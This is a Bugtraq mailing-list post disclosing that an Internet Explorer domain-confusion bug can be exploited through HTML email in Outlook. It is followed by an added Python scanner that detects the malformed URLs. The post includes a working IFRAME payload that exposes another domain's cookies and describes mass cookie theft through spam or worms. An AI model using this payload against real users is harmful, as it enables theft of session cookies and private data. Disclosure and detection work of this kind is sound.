Bugtraq mailing list archives
IE Domain Confusion Vulnerability is an Email problem also
From: rms2000 () BELLATLANTIC NET (Richard M. Smith)
Date: Fri, 12 May 2000 08:33:48 -0400
Hi,

This same IE bug can also be exploited from an HTML Email message in Outlook and Outlook Express. The trick is to put the magic URL in an HTML IFRAME tag. Example:

<iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2f showcookie.html%3f.yahoo.com/"> </iframe>

A malicious Email message could include many IFRAMEs to grab cookies from different domains. The cookies are stolen when the message is read.

Using an Email message, an attack can be directed at a particular person or a group of people without them ever going to a Web site. The exploit could also be included in a spam Email message or in the payload of an Email worm/virus.

I suspect that the same trick works in newsgroup messages, but I haven't had the time to run the experiment.

This is a pretty bad bug. People's private data at Web sites is at risk here.

Richard

==========================================
Richard M. Smith
Internet consultant
Email: rms2000 () bellatlantic net
http://www.tiac.net/users/smiths
==========================================
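A defensive check for the URL shape shown in the message above, a host part carrying percent-encoded `/` and `?` (added example, not part of the original post; the attribute list and the one.example/two.example names are assumptions). It scans the HTML parts of a mail message and reports each URL attribute whose authority hides an encoded delimiter, along with the host that results once the authority is decoded.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Encoded "/", "?", "#" or "\" has no business inside a host name.
ENCODED_DELIM = re.compile(r"%(2f|3f|23|5c)", re.IGNORECASE)
URL_ATTRS = {"src", "href", "background", "action"}  # assumed attribute set

def host_confusion(url):
    """Return (authority as written, host once decoded) or None if clean."""
    netloc = urlsplit(url).netloc
    if not ENCODED_DELIM.search(netloc):
        return None
    # A parser that decodes too early sees the host end at the first delimiter.
    return netloc, re.split(r"[/?#\\]", unquote(netloc), maxsplit=1)[0]

class UrlAttrScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            hit = host_confusion(value) if name in URL_ATTRS and value else None
            if hit:
                self.findings.append((tag, *hit))

def scan_message(raw):
    """Scan every text/html part of an RFC 822 message; return findings."""
    scanner = UrlAttrScanner()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "latin-1"
            scanner.feed(part.get_payload(decode=True).decode(charset, "replace"))
    scanner.close()
    return scanner.findings

# Constructed sample message; one.example and two.example are placeholders.
SAMPLE = (
    "From: a@one.example\nSubject: test\nMIME-Version: 1.0\n"
    "Content-Type: text/html; charset=us-ascii\n\n"
    '<p>Hello</p>\n'
    '<iframe src="http://one.example%2fdir%2fpage.html%3f.two.example/"></iframe>\n'
    '<img src="http://two.example/logo.gif?next=%2fhome">\n'
)

if __name__ == "__main__":
    for tag, written, host in scan_message(SAMPLE):
        print(f"<{tag}> authority {written!r} decodes to host {host!r}")
```

Encoded delimiters in the path or query, as in the sample `<img>`, are legitimate and are not reported; only the authority is checked.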